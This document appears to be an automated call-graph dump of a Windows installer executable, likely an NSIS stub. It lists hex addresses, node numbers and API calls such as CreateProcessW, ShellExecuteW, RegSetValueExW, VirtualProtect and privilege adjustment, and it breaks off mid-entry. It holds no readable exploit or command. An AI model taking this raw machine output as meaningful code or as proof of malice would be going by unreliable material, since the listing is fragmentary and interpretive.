4040ed SendMessageW 5056->5061 5063 405540 5057->5063 5064 40554e 5057->5064 5062 405527 5058->5062 5065 4053f4 5059->5065 5066 4053d8 SendMessageW SendMessageW 5059->5066 5061->5053 5068 4051af 25 API calls 5063->5068 5069 4040ed SendMessageW 5064->5069 5070 405407 5065->5070 5071 4053f9 SendMessageW 5065->5071 5066->5065 5067->5062 5072 40557b CreatePopupMenu 5067->5072 5068->5064 5069->5055 5074 404114 19 API calls 5070->5074 5071->5070 5073 406072 18 API calls 5072->5073 5076 40558b AppendMenuW 5073->5076 5075 405417 5074->5075 5079 405420 ShowWindow 5075->5079 5080 405454 GetDlgItem SendMessageW 5075->5080 5077 4055a8 GetWindowRect 5076->5077 5078 4055bb TrackPopupMenu 5076->5078 5077->5078 5078->5062 5081 4055d6 5078->5081 5082 405443 5079->5082 5083 405436 ShowWindow 5079->5083 5080->5062 5084 40547b SendMessageW SendMessageW 5080->5084 5085 4055f2 SendMessageW 5081->5085 5091 404149 SendMessageW 5082->5091 5083->5082 5084->5062 5085->5085 5086 40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5085->5086 5088 405634 SendMessageW 5086->5088 5088->5088 5089 40565d GlobalUnlock SetClipboardData CloseClipboard 5088->5089 5089->5062 5090->5051 5091->5080 5092->5054 5093 4014f1 SetForegroundWindow 5094 402a4c 5093->5094 5095 401673 5096 402bbf 18 API calls 5095->5096 5097 40167a 5096->5097 5098 402bbf 18 API calls 5097->5098 5099 401683 5098->5099 5100 402bbf 18 API calls 5099->5100 5101 40168c MoveFileW 5100->5101 5102 40169f 5101->5102 5108 401698 5101->5108 5103 406393 2 API calls 5102->5103 5106 4021e1 5102->5106 5105 4016ae 5103->5105 5104 401423 25 API calls 5104->5106 5105->5106 5107 405ef1 38 API calls 5105->5107 5107->5108 5108->5104 5109 100016b6 5110 100016e5 5109->5110 5111 10001b18 22 API calls 5110->5111 5112 100016ec 5111->5112 5113 100016f3 5112->5113 5114 100016ff 5112->5114 5115 10001272 2 API calls 5113->5115 5116 10001726 5114->5116 5117 10001709 5114->5117 5122 100016fd 5115->5122 5119 10001750 5116->5119 5120 1000172c 5116->5120 5118 1000153d 3 API calls 5117->5118 5124 1000170e 5118->5124 5123 1000153d 3 API calls 5119->5123 5121 100015b4 3 API calls 5120->5121 5125 10001731 5121->5125 5123->5122 5126 100015b4 3 API calls 5124->5126 5127 10001272 2 API calls 5125->5127 5128 10001714 5126->5128 5129 10001737 GlobalFree 5127->5129 5130 10001272 2 API calls 5128->5130 5129->5122 5131 1000174b GlobalFree 5129->5131 5132 1000171a GlobalFree 5130->5132 5131->5122 5132->5122 5133 10002238 5134 10002296 5133->5134 5135 100022cc 5133->5135 5134->5135 5136 100022a8 GlobalAlloc 5134->5136 5136->5134 5137 401cfa GetDlgItem GetClientRect 5138 402bbf 18 API calls 5137->5138 5139 401d2c LoadImageW SendMessageW 5138->5139 5140 401d4a DeleteObject 5139->5140 5141 402a4c 5139->5141 5140->5141 4702 40237b 4703 402381 4702->4703 4704 402bbf 18 API calls 4703->4704 4705 402393 4704->4705 4706 402bbf 18 API calls 4705->4706 4707 40239d RegCreateKeyExW 4706->4707 4708 4023c7 4707->4708 4711 40281e 4707->4711 4709 4023e2 4708->4709 4710 402bbf 18 API calls 4708->4710 4713 402ba2 18 API calls 4709->4713 4715 4023ee 4709->4715 4712 4023d8 lstrlenW 4710->4712 4712->4709 4713->4715 4714 402409 RegSetValueExW 4717 40241f RegCloseKey 4714->4717 4715->4714 4716 403027 32 API calls 4715->4716 4716->4714 4717->4711 5142 4027fb 5143 402bbf 18 API calls 5142->5143 5144 402802 FindFirstFileW 5143->5144 5145 402815 5144->5145 5146 40282a 5144->5146 5147 402833 5146->5147 5150 405f97 wsprintfW 5146->5150 5151 406050 lstrcpynW 5147->5151 5150->5147 5151->5145 5152 1000103d 5153 1000101b 5 API calls 5152->5153 5154 10001056 5153->5154 5155 4014ff 5156 401507 5155->5156 5158 40151a 5155->5158 5157 402ba2 18 API calls 5156->5157 5157->5158 5159 401000 5160 401037 BeginPaint GetClientRect 5159->5160 5161 40100c DefWindowProcW 5159->5161 5163 4010f3 5160->5163 5164 401179 5161->5164 5165 401073 CreateBrushIndirect FillRect DeleteObject 5163->5165 5166 4010fc 5163->5166 5165->5163 5167 401102 CreateFontIndirectW 5166->5167 5168 401167 EndPaint 5166->5168 5167->5168 5169 401112 6 API calls 5167->5169 5168->5164 5169->5168 5170 401904 5171 40193b 5170->5171 5172 402bbf 18 API calls 5171->5172 5173 401940 5172->5173 5174 405841 69 API calls 5173->5174 5175 401949 5174->5175 5176 402d04 5177 402d16 SetTimer 5176->5177 5178 402d2f 5176->5178 5177->5178 5179 402d84 5178->5179 5180 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5178->5180 5180->5179 5181 404905 5182 404931 5181->5182 5183 404915 5181->5183 5185 404964 5182->5185 5186 404937 SHGetPathFromIDListW 5182->5186 5192 405779 GetDlgItemTextW 5183->5192 5188 404947 5186->5188 5191 40494e SendMessageW 5186->5191 5187 404922 SendMessageW 5187->5182 5189 40140b 2 API calls 5188->5189 5189->5191 5191->5185 5192->5187 4474 402786 4475 40278d 4474->4475 4478 4029f7 4474->4478 4476 402ba2 18 API calls 4475->4476 4477 402798 4476->4477 4479 40279f SetFilePointer 4477->4479 4479->4478 4480 4027af 4479->4480 4482 405f97 wsprintfW 4480->4482 4482->4478 4524 100027c7 4525 10002817 4524->4525 4526 100027d7 VirtualProtect 4524->4526 4526->4525 5193 401907 5194 402bbf 18 API calls 5193->5194 5195 40190e 5194->5195 5196 405795 MessageBoxIndirectW 5195->5196 5197 401917 5196->5197 5198 401e08 5199 402bbf 18 API calls 5198->5199 5200 401e0e 5199->5200 5201 402bbf 18 API calls 5200->5201 5202 401e17 5201->5202 5203 402bbf 18 API calls 5202->5203 5204 401e20 5203->5204 5205 402bbf 18 API calls 5204->5205 5206 401e29 5205->5206 5207 401423 25 API calls 5206->5207 5208 401e30 ShellExecuteW 5207->5208 5209 401e61 5208->5209 5215 1000164f 5216 10001516 GlobalFree 5215->5216 5218 10001667 5216->5218 5217 100016ad GlobalFree 5218->5217 5219 10001682 5218->5219 5220 10001699 VirtualFree 5218->5220 5219->5217 5220->5217 5221 401a15 5222 402bbf 18 API calls 5221->5222 5223 401a1e ExpandEnvironmentStringsW 5222->5223 5224 401a32 5223->5224 5226 401a45 5223->5226 5225 401a37 lstrcmpW 5224->5225 5224->5226 5225->5226 5227 402095 5228 402bbf 18 API calls 5227->5228 5229 40209c 5228->5229 5230 402bbf 18 API calls 5229->5230 5231 4020a6 5230->5231 5232 402bbf 18 API calls 5231->5232 5233 4020b0 5232->5233 5234 402bbf 18 API calls 5233->5234 5235 4020ba 5234->5235 5236 402bbf 18 API calls 5235->5236 5238 4020c4 5236->5238 5237 402103 CoCreateInstance 5242 402122 5237->5242 5238->5237 5239 402bbf 18 API calls 5238->5239 5239->5237 5240 401423 25 API calls 5241 4021e1 5240->5241 5242->5240 5242->5241 5243 402515 5244 402bbf 18 API calls 5243->5244 5245 40251c 5244->5245 5248 405c25 GetFileAttributesW CreateFileW 5245->5248 5247 402528 5248->5247 5249 401b16 5250 402bbf 18 API calls 5249->5250 5251 401b1d 5250->5251 5252 402ba2 18 API calls 5251->5252 5253 401b26 wsprintfW 5252->5253 5254 402a4c 5253->5254 4658 10001058 4660 10001074 4658->4660 4659 100010dd 4660->4659 4661 10001092 4660->4661 4672 10001516 4660->4672 4663 10001516 GlobalFree 4661->4663 4664 100010a2 4663->4664 4665 100010b2 4664->4665 4666 100010a9 GlobalSize 4664->4666 4667 100010b6 GlobalAlloc 4665->4667 4668 100010c8 4665->4668 4666->4665 4669 1000153d 3 API calls 4667->4669 4671 100010d2 GlobalFree 4668->4671 4670 100010c7 4669->4670 4670->4668 4671->4659 4674 1000151c 4672->4674 4673 10001522 4673->4661 4674->4673 4675 1000152e GlobalFree 4674->4675 4675->4661 5255 40159b 5256 402bbf 18 API calls 5255->5256 5257 4015a2 SetFileAttributesW 5256->5257 5258 4015b4 5257->5258 4796 40229d 4797 4022a5 4796->4797 4798 4022ab 4796->4798 4800 402bbf 18 API calls 4797->4800 4799 4022b9 4798->4799 4801 402bbf 18 API calls 4798->4801 4802 4022c7 4799->4802 4803 402bbf 18 API calls 4799->4803 4800->4798 4801->4799 4804 402bbf 18 API calls 4802->4804 4803->4802 4805 4022d0 WritePrivateProfileStringW 4804->4805 5259 401f1d 5260 402bbf 18 API calls 5259->5260 5261 401f24 5260->5261 5262 40642a 5 API calls 5261->5262 5263 401f33 5262->5263 5264 401f4f GlobalAlloc 5263->5264 5273 401fb7 5263->5273 5265 401f63 5264->5265 5264->5273 5266 40642a 5 API calls 5265->5266 5267 401f6a 5266->5267 5268 40642a 5 API calls 5267->5268 5269 401f74 5268->5269 5269->5273 5274 405f97 wsprintfW 5269->5274 5271 401fa9 5275 405f97 wsprintfW 5271->5275 5274->5271 5275->5273 5276 40149e 5277 4014ac PostQuitMessage 5276->5277 5278 402288 5276->5278 5277->5278 5279 40249e 5280 402cc9 19 API calls 5279->5280 5281 4024a8 5280->5281 5282 402ba2 18 API calls 5281->5282 5283 4024b1 5282->5283 5284 4024d5 RegEnumValueW 5283->5284 5285 4024c9 RegEnumKeyW 5283->5285 5287 40281e 5283->5287 5286 4024ee RegCloseKey 5284->5286 5284->5287 5285->5286 5286->5287 5289 40231f 5290 402324 5289->5290 5291 40234f 5289->5291 5293 402cc9 19 API calls 5290->5293 5292 402bbf 18 API calls 5291->5292 5294 402356 5292->5294 5295 40232b 5293->5295 5300 402bff RegOpenKeyExW 5294->5300 5296 402bbf 18 API calls 5295->5296 5299 40236c 5295->5299 5298 40233c RegDeleteValueW RegCloseKey 5296->5298 5298->5299 5304 402c2a 5300->5304 5309 402c76 5300->5309 5301 402c50 RegEnumKeyW 5302 402c62 RegCloseKey 5301->5302 5301->5304 5305 40642a 5 API calls 5302->5305 5303 402c87 RegCloseKey 5303->5309 5304->5301 5304->5302 5304->5303 5306 402bff 5 API calls 5304->5306 5307 402c72 5305->5307 5306->5304 5308 402ca2 RegDeleteKeyW 5307->5308 5307->5309 5308->5309 5309->5299 3746 4032a0 SetErrorMode GetVersion 3747 4032d5 3746->3747 3748 4032db 3746->3748 3749 40642a 5 API calls 3747->3749 3834 4063ba GetSystemDirectoryW 3748->3834 3749->3748 3751 4032f1 lstrlenA 3751->3748 3752 403301 3751->3752 3837 40642a GetModuleHandleA 3752->3837 3755 40642a 5 API calls 3756 403310 #17 OleInitialize SHGetFileInfoW 3755->3756 3843 406050 lstrcpynW 3756->3843 3758 40334d GetCommandLineW 3844 406050 lstrcpynW 3758->3844 3760 40335f GetModuleHandleW 3761 403377 3760->3761 3845 405a31 3761->3845 3764 4034b0 GetTempPathW 3849 40326f 3764->3849 3766 4034c8 3767 403522 DeleteFileW 3766->3767 3768 4034cc GetWindowsDirectoryW lstrcatW 3766->3768 3859 402dee GetTickCount GetModuleFileNameW 3767->3859 3770 40326f 12 API calls 3768->3770 3773 4034e8 3770->3773 3771 405a31 CharNextW 3774 40339f 3771->3774 3772 403536 3780 405a31 CharNextW 3772->3780 3816 4035d9 3772->3816 3829 4035e9 3772->3829 3773->3767 3775 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3773->3775 3774->3771 3776 403499 3774->3776 3778 40349b 3774->3778 3779 40326f 12 API calls 3775->3779 3776->3764 3943 406050 lstrcpynW 3778->3943 3784 40351a 3779->3784 3797 403555 3780->3797 3784->3767 3784->3829 3785 403723 3787 4037a7 ExitProcess 3785->3787 3788 40372b GetCurrentProcess OpenProcessToken 3785->3788 3786 403603 3967 405795 3786->3967 3790 403743 LookupPrivilegeValueW AdjustTokenPrivileges 3788->3790 3791 403777 3788->3791 3790->3791 3796 40642a 5 API calls 3791->3796 3793 4035b3 3944 405b0c 3793->3944 3794 403619 3971 405718 3794->3971 3805 40377e 3796->3805 3797->3793 3797->3794 3802 40363a lstrcatW lstrcmpiW 3807 403656 3802->3807 3802->3829 3803 40362f lstrcatW 3803->3802 3804 403793 ExitWindowsEx 3804->3787 3808 4037a0 3804->3808 3805->3804 3805->3808 3810 403662 3807->3810 3811 40365b 3807->3811 4009 40140b 3808->4009 3809 4035ce 3959 406050 lstrcpynW 3809->3959 3979 4056fb CreateDirectoryW 3810->3979 3974 40567e CreateDirectoryW 3811->3974 3887 403899 3816->3887 3818 403667 SetCurrentDirectoryW 3819 403682 3818->3819 3820 403677 3818->3820 3983 406050 lstrcpynW 3819->3983 3982 406050 lstrcpynW 3820->3982 3825 4036ce CopyFileW 3831 403690 3825->3831 3826 403717 3828 405ef1 38 API calls 3826->3828 3828->3829 3960 4037bf 3829->3960 3830 406072 18 API calls 3830->3831 3831->3826 3831->3830 3833 403702 CloseHandle 3831->3833 3984 406072 3831->3984 4002 405ef1 MoveFileExW 3831->4002 4006 405730 CreateProcessW 3831->4006 3833->3831 3835 4063dc wsprintfW LoadLibraryExW 3834->3835 3835->3751 3838 406450 GetProcAddress 3837->3838 3839 406446 3837->3839 3841 403309 3838->3841 3840 4063ba 3 API calls 3839->3840 3842 40644c 3840->3842 3841->3755 3842->3838 3842->3841 3843->3758 3844->3760 3846 405a37 3845->3846 3847 403386 CharNextW 3846->3847 3848 405a3e CharNextW 3846->3848 3847->3764 3847->3774 3848->3846 4012 4062e4 3849->4012 3851 403285 3851->3766 3852 40327b 3852->3851 4021 405a04 lstrlenW CharPrevW 3852->4021 3855 4056fb 2 API calls 3856 403293 3855->3856 4024 405c54 3856->4024 4028 405c25 GetFileAttributesW CreateFileW 3859->4028 3861 402e2e 3881 402e3e 3861->3881 4029 406050 lstrcpynW 3861->4029 3863 402e54 4030 405a50 lstrlenW 3863->4030 3867 402e65 GetFileSize 3872 402e7c 3867->3872 3884 402f61 3867->3884 3869 402f6a 3871 402f9a GlobalAlloc 3869->3871 3869->3881 4070 403258 SetFilePointer 3869->4070 4046 403258 SetFilePointer 3871->4046 3874 402fcd 3872->3874 3872->3881 3883 402d8a 6 API calls 3872->3883 3872->3884 4067 403242 3872->4067 3878 402d8a 6 API calls 3874->3878 3876 402f83 3879 403242 ReadFile 3876->3879 3877 402fb5 4047 403027 3877->4047 3878->3881 3882 402f8e 3879->3882 3881->3772 3882->3871 3882->3881 3883->3872 4035 402d8a 3884->4035 3886 402ffe SetFilePointer 3886->3881 3888 40642a 5 API calls 3887->3888 3889 4038ad 3888->3889 3890 4038b3 3889->3890 3891 4038c5 3889->3891 4105 405f97 wsprintfW 3890->4105 3892 405f1d 3 API calls 3891->3892 3893 4038f5 3892->3893 3895 403914 lstrcatW 3893->3895 3897 405f1d 3 API calls 3893->3897 3896 4038c3 3895->3896 4091 403b6f 3896->4091 3897->3895 3900 405b0c 18 API calls 3901 403946 3900->3901 3902 4039da 3901->3902 4100 405f1d RegOpenKeyExW 3901->4100 3903 405b0c 18 API calls 3902->3903 3906 4039e0 3903->3906 3905 4039f0 LoadImageW 3909 403a96 3905->3909 3910 403a17 RegisterClassW 3905->3910 3906->3905 3908 406072 18 API calls 3906->3908 3908->3905 3913 40140b 2 API calls 3909->3913 3912 403a4d SystemParametersInfoW CreateWindowExW 3910->3912 3942 403aa0 3910->3942 3911 403999 lstrlenW 3916 4039a7 lstrcmpiW 3911->3916 3917 4039cd 3911->3917 3912->3909 3914 403a9c 3913->3914 3921 403b6f 19 API calls 3914->3921 3914->3942 3915 405a31 CharNextW 3919 403996 3915->3919 3916->3917 3920 4039b7 GetFileAttributesW 3916->3920 3918 405a04 3 API calls 3917->3918 3922 4039d3 3918->3922 3919->3911 3923 4039c3 3920->3923 3925 403aad 3921->3925 4106 406050 lstrcpynW 3922->4106 3923->3917 3924 405a50 2 API calls 3923->3924 3924->3917 3927 403ab9 ShowWindow 3925->3927 3928 403b3c 3925->3928 3930 4063ba 3 API calls 3927->3930 4107 405282 OleInitialize 3928->4107 3932 403ad1 3930->3932 3931 403b42 3933 403b46 3931->3933 3934 403b5e 3931->3934 3935 403adf GetClassInfoW 3932->3935 3937 4063ba 3 API calls 3932->3937 3940 40140b 2 API calls 3933->3940 3933->3942 3936 40140b 2 API calls 3934->3936 3938 403af3 GetClassInfoW RegisterClassW 3935->3938 3939 403b09 DialogBoxParamW 3935->3939 3936->3942 3937->3935 3938->3939 3941 40140b 2 API calls 3939->3941 3940->3942 3941->3942 3942->3829 3943->3776 4122 406050 lstrcpynW 3944->4122 3946 405b1d 4123 405aaf CharNextW CharNextW 3946->4123 3949 4035bf 3949->3829 3958 406050 lstrcpynW 3949->3958 3950 4062e4 5 API calls 3956 405b33 3950->3956 3951 405b64 lstrlenW 3952 405b6f 3951->3952 3951->3956 3954 405a04 3 API calls 3952->3954 3955 405b74 GetFileAttributesW 3954->3955 3955->3949 3956->3949 3956->3951 3957 405a50 2 API calls 3956->3957 4129 406393 FindFirstFileW 3956->4129 3957->3951 3958->3809 3959->3816 3961 4037d7 3960->3961 3962 4037c9 CloseHandle 3960->3962 4132 403804 3961->4132 3962->3961 3969 4057aa 3967->3969 3968 403611 ExitProcess 3969->3968 3970 4057be MessageBoxIndirectW 3969->3970 3970->3968 3972 40642a 5 API calls 3971->3972 3973 40361e lstrcatW 3972->3973 3973->3802 3973->3803 3975 403660 3974->3975 3976 4056cf GetLastError 3974->3976 3975->3818 3976->3975 3977 4056de SetFileSecurityW 3976->3977 3977->3975 3978 4056f4 GetLastError 3977->3978 3978->3975 3980 40570b 3979->3980 3981 40570f GetLastError 3979->3981 3980->3818 3981->3980 3982->3819 3983->3831 3989 40607f 3984->3989 3985 4062ca 3986 4036c1 DeleteFileW 3985->3986 4190 406050 lstrcpynW 3985->4190 3986->3825 3986->3831 3988 406132 GetVersion 3988->3989 3989->3985 3989->3988 3990 406298 lstrlenW 3989->3990 3991 406072 10 API calls 3989->3991 3994 4061ad GetSystemDirectoryW 3989->3994 3995 405f1d 3 API calls 3989->3995 3996 4061c0 GetWindowsDirectoryW 3989->3996 3997 4062e4 5 API calls 3989->3997 3998 406072 10 API calls 3989->3998 3999 406239 lstrcatW 3989->3999 4000 4061f4 SHGetSpecialFolderLocation 3989->4000 4188 405f97 wsprintfW 3989->4188 4189 406050 lstrcpynW 3989->4189 3990->3989 3991->3990 3994->3989 3995->3989 3996->3989 3997->3989 3998->3989 3999->3989 4000->3989 4001 40620c SHGetPathFromIDListW CoTaskMemFree 4000->4001 4001->3989 4003 405f12 4002->4003 4004 405f05 4002->4004 4003->3831 4191 405d7f lstrcpyW 4004->4191 4007 405763 CloseHandle 4006->4007 4008 40576f 4006->4008 4007->4008 4008->3831 4010 401389 2 API calls 4009->4010 4011 401420 4010->4011 4011->3787 4019 4062f1 4012->4019 4013 40636c CharPrevW 4017 406367 4013->4017 4014 40635a CharNextW 4014->4017 4014->4019 4015 40638d 4015->3852 4016 405a31 CharNextW 4016->4019 4017->4013 4017->4015 4018 406346 CharNextW 4018->4019 4019->4014 4019->4016 4019->4017 4019->4018 4020 406355 CharNextW 4019->4020 4020->4014 4022 405a20 lstrcatW 4021->4022 4023 40328d 4021->4023 4022->4023 4023->3855 4025 405c61 GetTickCount GetTempFileNameW 4024->4025 4026 40329e 4025->4026 4027 405c97 4025->4027 4026->3766 4027->4025 4027->4026 4028->3861 4029->3863 4031 405a5e 4030->4031 4032 402e5a 4031->4032 4033 405a64 CharPrevW 4031->4033 4034 406050 lstrcpynW 4032->4034 4033->4031 4033->4032 4034->3867 4036 402d93 4035->4036 4037 402dab 4035->4037 4040 402da3 4036->4040 4041 402d9c DestroyWindow 4036->4041 4038 402db3 4037->4038 4039 402dbb GetTickCount 4037->4039 4071 406466 4038->4071 4043 402dc9 CreateDialogParamW ShowWindow 4039->4043 4044 402dec 4039->4044 4040->3869 4041->4040 4043->4044 4044->3869 4046->3877 4048 403040 4047->4048 4049 40306e 4048->4049 4077 403258 SetFilePointer 4048->4077 4051 403242 ReadFile 4049->4051 4052 403079 4051->4052 4053 4031db 4052->4053 4054 40308b GetTickCount 4052->4054 4056 402fc1 4052->4056 4055 40321d 4053->4055 4060 4031df 4053->4060 4054->4056 4063 4030da 4054->4063 4058 403242 ReadFile 4055->4058 4056->3881 4056->3886 4057 403242 ReadFile 4057->4063 4058->4056 4059 403242 ReadFile 4059->4060 4060->4056 4060->4059 4061 405cd7 WriteFile 4060->4061 4061->4060 4062 403130 GetTickCount 4062->4063 4063->4056 4063->4057 4063->4062 4064 403155 MulDiv wsprintfW 4063->4064 4075 405cd7 WriteFile 4063->4075 4078 4051af 4064->4078 4089 405ca8 ReadFile 4067->4089 4070->3876 4072 406483 PeekMessageW 4071->4072 4073 402db9 4072->4073 4074 406479 DispatchMessageW 4072->4074 4073->3869 4074->4072 4076 405cf5 4075->4076 4076->4063 4077->4049 4079 4051ca 4078->4079 4088 40526c 4078->4088 4080 4051e6 lstrlenW 4079->4080 4081 406072 18 API calls 4079->4081 4082 4051f4 lstrlenW 4080->4082 4083 40520f 4080->4083 4081->4080 4084 405206 lstrcatW 4082->4084 4082->4088 4085 405222 4083->4085 4086 405215 SetWindowTextW 4083->4086 4084->4083 4087 405228 SendMessageW SendMessageW SendMessageW 4085->4087 4085->4088 4086->4085 4087->4088 4088->4063 4090 403255 4089->4090 4090->3872 4092 403b83 4091->4092 4114 405f97 wsprintfW 4092->4114 4094 403bf4 4095 406072 18 API calls 4094->4095 4096 403c00 SetWindowTextW 4095->4096 4097 403924 4096->4097 4098 403c1c 4096->4098 4097->3900 4098->4097 4099 406072 18 API calls 4098->4099 4099->4098 4101 403978 4100->4101 4102 405f51 RegQueryValueExW 4100->4102 4101->3902 4101->3911 4101->3915 4103 405f72 RegCloseKey 4102->4103 4103->4101 4105->3896 4106->3902 4115 404160 4107->4115 4109 4052cc 4110 404160 SendMessageW 4109->4110 4111 4052de OleUninitialize 4110->4111 4111->3931 4112 4052a5 4112->4109 4118 401389 4112->4118 4114->4094 4116 404178 4115->4116 4117 404169 SendMessageW 4115->4117 4116->4112 4117->4116 4119 401390 4118->4119 4120 4013fe 4119->4120 4121 4013cb MulDiv SendMessageW 4119->4121 4120->4112 4121->4119 4122->3946 4124 405acc 4123->4124 4128 405ade 4123->4128 4125 405ad9 CharNextW 4124->4125 4124->4128 4126 405b02 4125->4126 4126->3949 4126->3950 4127 405a31 CharNextW 4127->4128 4128->4126 4128->4127 4130 4063b4 4129->4130 4131 4063a9 FindClose 4129->4131 4130->3956 4131->4130 4133 403812 4132->4133 4134 403817 FreeLibrary GlobalFree 4133->4134 4135 4037dc 4133->4135 4134->4134 4134->4135 4136 405841 4135->4136 4137 405b0c 18 API calls 4136->4137 4138 405861 4137->4138 4139 405880 4138->4139 4140 405869 DeleteFileW 4138->4140 4143 4059ab 4139->4143 4175 406050 lstrcpynW 4139->4175 4141 4035f2 OleUninitialize 4140->4141 4141->3785 4141->3786 4143->4141 4149 406393 2 API calls 4143->4149 4144 4058a6 4145 4058b9 4144->4145 4146 4058ac lstrcatW 4144->4146 4148 405a50 2 API calls 4145->4148 4147 4058bf 4146->4147 4150 4058cf lstrcatW 4147->4150 4152 4058da lstrlenW FindFirstFileW 4147->4152 4148->4147 4151 4059c5 4149->4151 4150->4152 4151->4141 4153 4059c9 4151->4153 4154 4059a0 4152->4154 4173 4058fc 4152->4173 4155 405a04 3 API calls 4153->4155 4154->4143 4156 4059cf 4155->4156 4158 4057f9 5 API calls 4156->4158 4157 405983 FindNextFileW 4160 405999 FindClose 4157->4160 4157->4173 4161 4059db 4158->4161 4160->4154 4162 4059f5 4161->4162 4163 4059df 4161->4163 4165 4051af 25 API calls 4162->4165 4163->4141 4166 4051af 25 API calls 4163->4166 4165->4141 4168 4059ec 4166->4168 4167 405841 62 API calls 4167->4173 4169 405ef1 38 API calls 4168->4169 4171 4059f3 4169->4171 4170 4051af 25 API calls 4170->4157 4171->4141 4172 4051af 25 API calls 4172->4173 4173->4157 4173->4167 4173->4170 4173->4172 4174 405ef1 38 API calls 4173->4174 4176 406050 lstrcpynW 4173->4176 4177 4057f9 4173->4177 4174->4173 4175->4144 4176->4173 4185 405c00 GetFileAttributesW 4177->4185 4180 405814 RemoveDirectoryW 4182 405822 4180->4182 4181 40581c DeleteFileW 4181->4182 4183 405826 4182->4183 4184 405832 SetFileAttributesW 4182->4184 4183->4173 4184->4183 4186 405c12 SetFileAttributesW 4185->4186 4187 405805 4185->4187 4186->4187 4187->4180 4187->4181 4187->4183 4188->3989 4189->3989 4190->3986 4192 405da7 4191->4192 4193 405dcd GetShortPathNameW 4191->4193 4218 405c25 GetFileAttributesW CreateFileW 4192->4218 4195 405de2 4193->4195 4196 405eec 4193->4196 4195->4196 4198 405dea wsprintfA 4195->4198 4196->4003 4197 405db1 CloseHandle GetShortPathNameW 4197->4196 4199 405dc5 4197->4199 4200 406072 18 API calls 4198->4200 4199->4193 4199->4196 4201 405e12 4200->4201 4219 405c25 GetFileAttributesW CreateFileW 4201->4219 4203 405e1f 4203->4196 4204 405e2e GetFileSize GlobalAlloc 4203->4204 4205 405e50 4204->4205 4206 405ee5 CloseHandle 4204->4206 4207 405ca8 ReadFile 4205->4207 4206->4196 4208 405e58 4207->4208 4208->4206 4220 405b8a lstrlenA 4208->4220 4211 405e83 4213 405b8a 4 API calls 4211->4213 4212 405e6f lstrcpyA 4214 405e91 4212->4214 4213->4214 4215 405ec8 SetFilePointer 4214->4215 4216 405cd7 WriteFile 4215->4216 4217 405ede GlobalFree 4216->4217 4217->4206 4218->4197 4219->4203 4221 405bcb lstrlenA 4220->4221 4222 405bd3 4221->4222 4223 405ba4 lstrcmpiA 4221->4223 4222->4211 4222->4212 4223->4222 4224 405bc2 CharNextA 4223->4224 4224->4221 5310 100010e1 5313 10001111 5310->5313 5311 100011d8 GlobalFree 5312 100012ba 2 API calls 5312->5313 5313->5311 5313->5312 5314 100011d3 5313->5314 5315 10001272 2 API calls 5313->5315 5316 10001164 GlobalAlloc 5313->5316 5317 100011f8 GlobalFree 5313->5317 5318 100012e1 lstrcpyW 5313->5318 5319 100011c4 GlobalFree 5313->5319 5314->5311 5315->5319 5316->5313 5317->5313 5318->5313 5319->5313 4416 405123 4417 405133 4416->4417 4418 405147 4416->4418 4419 405139 4417->4419 4429 405190 4417->4429 4420 40514f IsWindowVisible 4418->4420 4423 40516f 4418->4423 4421 404160 SendMessageW 4419->4421 4422 40515c 4420->4422 4420->4429 4425 405143 4421->4425 4430 404a79 SendMessageW 4422->4430 4424 405195 CallWindowProcW 4423->4424 4435 404af9 4423->4435 4424->4425 4429->4424 4431 404ad8 SendMessageW 4430->4431 4432 404a9c GetMessagePos ScreenToClient SendMessageW 4430->4432 4433 404ad0 4431->4433 4432->4433 4434 404ad5 4432->4434 4433->4423 4434->4431 4444 406050 lstrcpynW 4435->4444 4437 404b0c 4445 405f97 wsprintfW 4437->4445 4439 404b16 4440 40140b 2 API calls 4439->4440 4441 404b1f 4440->4441 4446 406050 lstrcpynW 4441->4446 4443 404b26 4443->4429 4444->4437 4445->4439 4446->4443 5320 401ca3 5321 402ba2 18 API calls 5320->5321 5322 401ca9 IsWindow 5321->5322 5323 401a05 5322->5323 5324 402a27 SendMessageW 5325 402a41 InvalidateRect 5324->5325 5326 402a4c 5324->5326 5325->5326 5327 404228 lstrcpynW lstrlenW 4527 40242a 4538 402cc9 4527->4538 4529 402434 4530 402bbf 18 API calls 4529->4530 4531 40243d 4530->4531 4532 402448 RegQueryValueExW 4531->4532 4537 40281e 4531->4537 4533 40246e RegCloseKey 4532->4533 4534 402468 4532->4534 4533->4537 4534->4533 4542 405f97 wsprintfW 4534->4542 4539 402bbf 18 API calls 4538->4539 4540 402ce2 4539->4540 4541 402cf0 RegOpenKeyExW 4540->4541 4541->4529 4542->4533 4543 404b2b GetDlgItem GetDlgItem 4544 404b7d 7 API calls 4543->4544 4553 404d96 4543->4553 4545 404c20 DeleteObject 4544->4545 4546 404c13 SendMessageW 4544->4546 4547 404c29 4545->4547 4546->4545 4549 404c38 4547->4549 4550 404c60 4547->4550 4548 404e7a 4551 404f26 4548->4551 4556 40510e 4548->4556 4562 404ed3 SendMessageW 4548->4562 4552 406072 18 API calls 4549->4552 4599 404114 4550->4599 4557 404f30 SendMessageW 4551->4557 4558 404f38 4551->4558 4559 404c42 SendMessageW SendMessageW 4552->4559 4553->4548 4554 404e5b 4553->4554 4560 404df6 4553->4560 4554->4548 4564 404e6c SendMessageW 4554->4564 4607 40417b 4556->4607 4557->4558 4570 404f51 4558->4570 4571 404f4a ImageList_Destroy 4558->4571 4575 404f61 4558->4575 4559->4547 4565 404a79 5 API calls 4560->4565 4561 404c74 4566 404114 19 API calls 4561->4566 4562->4556 4568 404ee8 SendMessageW 4562->4568 4564->4548 4578 404e07 4565->4578 4579 404c82 4566->4579 4567 4050d0 4567->4556 4576 4050e2 ShowWindow GetDlgItem ShowWindow 4567->4576 4573 404efb 4568->4573 4574 404f5a GlobalFree 4570->4574 4570->4575 4571->4570 4572 404d57 GetWindowLongW SetWindowLongW 4577 404d70 4572->4577 4584 404f0c SendMessageW 4573->4584 4574->4575 4575->4567 4589 404af9 4 API calls 4575->4589 4595 404f9c 4575->4595 4576->4556 4580 404d76 ShowWindow 4577->4580 4581 404d8e 4577->4581 4578->4554 4579->4572 4583 404cd2 SendMessageW 4579->4583 4585 404d51 4579->4585 4587 404d0e SendMessageW 4579->4587 4588 404d1f SendMessageW 4579->4588 4602 404149 SendMessageW 4580->4602 4603 404149 SendMessageW 4581->4603 4583->4579 4584->4551 4585->4572 4585->4577 4587->4579 4588->4579 4589->4595 4590 404d89 4590->4556 4591 4050a6 InvalidateRect 4591->4567 4593 4050bc 4591->4593 4592 